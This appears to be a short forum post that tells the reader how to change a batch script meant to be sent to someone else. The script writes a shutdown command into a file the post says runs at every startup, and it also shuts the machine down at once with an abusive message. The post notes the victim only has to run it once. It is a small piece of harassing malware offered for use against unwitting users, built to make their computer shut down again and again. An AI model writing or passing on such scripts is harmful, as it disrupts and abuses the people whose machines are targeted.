umm, find where I have the shutdown command (last two lines). You can change that command to whatever you want.
So you can change them to:
Code:
echo SHUTDOWN -S -t 1 -c Bye, Bye! >> C:\system_bat.bat
SHUTDOWN -S -t 1 -c Fuck you! Your in trouble now dipshit.
The first time you see it the shutdown command will be ran each time the PC startup items are loaded. The second time is just for the first time the BAT file you sent them will be ran. The script I gave you onlys needs to be ran by the user once. After that it doesn't matter.